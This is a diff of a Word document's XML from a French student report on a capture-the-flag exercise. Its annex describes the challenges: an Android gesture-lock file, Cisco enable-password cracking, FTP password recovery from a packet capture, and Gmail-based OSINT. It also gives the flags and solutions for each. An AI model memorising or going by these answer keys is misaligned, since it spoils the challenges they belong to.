+      <w:bookmarkStart w:id="22" w:name="_Toc509996611"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>III) Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7515,22 +7474,133 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc509930334"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc509996612"/>
       <w:r>
         <w:t>IV) Annexes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre2"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc509930335"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc509996613"/>
+      <w:r>
+        <w:t>Trello et Gantt Project</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29FEE8A5" wp14:editId="332FC8E6">
+            <wp:extent cx="5760720" cy="3420110"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="13" name="Image 13"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3420110"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0089D36A" wp14:editId="428033FE">
+            <wp:extent cx="5760720" cy="3073400"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="34" name="Image 34"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3073400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="25" w:name="_Toc509996614"/>
       <w:r>
         <w:t>Documentation technique des failles</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="25"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7752,6 +7822,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FEEFCFB" wp14:editId="296E2F7C">
@@ -7769,7 +7840,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7899,7 +7970,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7909,9 +7979,26 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>Flag</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>uncocalightsvp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7921,40 +8008,8 @@
           <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> de la faille A : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>uncocalightsvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
         <w:t xml:space="preserve">Flag de la faille B : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7964,7 +8019,6 @@
         </w:rPr>
         <w:t>uncocazerosvp</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7982,6 +8036,7 @@
         <w:rPr>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:br w:type="page"/>
       </w:r>
     </w:p>
@@ -8163,70 +8218,42 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>L’utilisateur possède un</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fichier </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>apk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:t xml:space="preserve">L’utilisateur possède un fichier apk </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Capture d’écran :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C90931" wp14:editId="70F83741">
@@ -8244,7 +8271,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8300,27 +8327,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">, se connecter sur la page </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>index.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, se connecter sur la page index.php </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8649,6 +8656,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03876F5B" wp14:editId="49801580">
@@ -8666,7 +8674,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -8724,27 +8732,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trouver le fichier </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>gesture.key</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, l’analyser et retrouver l’ordonnancement des points pour déverrouiller le téléphone </w:t>
+        <w:t xml:space="preserve">Trouver le fichier gesture.key, l’analyser et retrouver l’ordonnancement des points pour déverrouiller le téléphone </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9672,87 +9660,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>PREREQUIS : "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Challenge_Gmail</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">" Grâce au compte </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>gmail</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>john</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, trouvez ses renseignements pour </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>decouvrir</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> le flag</w:t>
+        <w:t>PREREQUIS : "Challenge_Gmail" Grâce au compte gmail de john, trouvez ses renseignements pour decouvrir le flag</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9905,6 +9813,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="26" w:name="_Toc509996615"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -9912,6 +9821,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Nom de la faille</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="26"/>
       <w:r>
         <w:t> : Faille Cisco</w:t>
       </w:r>
@@ -9921,11 +9831,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="27" w:name="_Toc509996616"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Catégorie </w:t>
+        <w:t>Catégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="27"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Cryptanalyse</w:t>
@@ -9936,11 +9854,19 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="28" w:name="_Toc509996617"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Objectif </w:t>
+        <w:t>Objectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="28"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Décrypter le mot de passe enable</w:t>
@@ -9951,12 +9877,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="29" w:name="_Toc509996618"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Description :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="29"/>
       <w:r>
         <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe enable dans un fichier de configuration Cisco, pour cela il a disposition une capture de d’un show run d’un routeur Cisco. Il dispose pour seule information des profils utilisateurs</w:t>
       </w:r>
@@ -9970,9 +9898,11 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="30" w:name="_Toc509996619"/>
       <w:r>
         <w:t>Capture d’écran :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10000,7 +9930,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId24"/>
                     <a:srcRect l="60000" t="28098" b="4711"/>
                     <a:stretch/>
                   </pic:blipFill>
@@ -10033,12 +9963,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="31" w:name="_Toc509996620"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Solution :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="31"/>
       <w:r>
         <w:t xml:space="preserve"> Décrypter les mots de passe des différents profils utilisateurs et faire un croisement avec le mot de passe enable</w:t>
       </w:r>
@@ -10048,12 +9980,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="32" w:name="_Toc509996621"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team A :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="32"/>
       <w:r>
         <w:t xml:space="preserve"> en4ble_6sko</w:t>
       </w:r>
@@ -10063,12 +9997,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="33" w:name="_Toc509996622"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team B :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="33"/>
       <w:r>
         <w:t xml:space="preserve"> en@ble_6sko</w:t>
       </w:r>
@@ -10129,6 +10065,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="34" w:name="_Toc509996623"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -10136,27 +10073,28 @@
         <w:lastRenderedPageBreak/>
         <w:t>Nom de la faille</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> FTP – ftp-017</w:t>
+      <w:bookmarkEnd w:id="34"/>
+      <w:r>
+        <w:t> : Password FTP – ftp-017</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:ind w:left="1062" w:firstLine="3"/>
       </w:pPr>
+      <w:bookmarkStart w:id="35" w:name="_Toc509996624"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>Catégorie </w:t>
+        <w:t>Catégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="35"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: FTP</w:t>
@@ -10167,6 +10105,7 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="36" w:name="_Toc509996625"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -10177,7 +10116,14 @@
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
-        <w:t>bjectif </w:t>
+        <w:t>bjectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="36"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
       </w:r>
       <w:r>
         <w:t>: Retrouver le mot de passe de connexion</w:t>
@@ -10188,12 +10134,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="37" w:name="_Toc509996626"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Description :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="37"/>
       <w:r>
         <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe de connexion de la session user sur le serveur FTP, il dispose d’une capture de trame des échanges entre l’utilisateur et le serveur FTP.</w:t>
       </w:r>
@@ -10203,9 +10151,11 @@
         <w:pStyle w:val="Titre2"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="38" w:name="_Toc509996627"/>
       <w:r>
         <w:t>Capture d’écran :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="38"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10222,326 +10172,6 @@
             <wp:extent cx="5760720" cy="1155084"/>
             <wp:effectExtent l="0" t="0" r="0" b="6985"/>
             <wp:docPr id="25" name="Image 25"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1155084"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528BB5D7" wp14:editId="54CBDF28">
-            <wp:extent cx="5760720" cy="3114317"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="26" name="Image 26"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
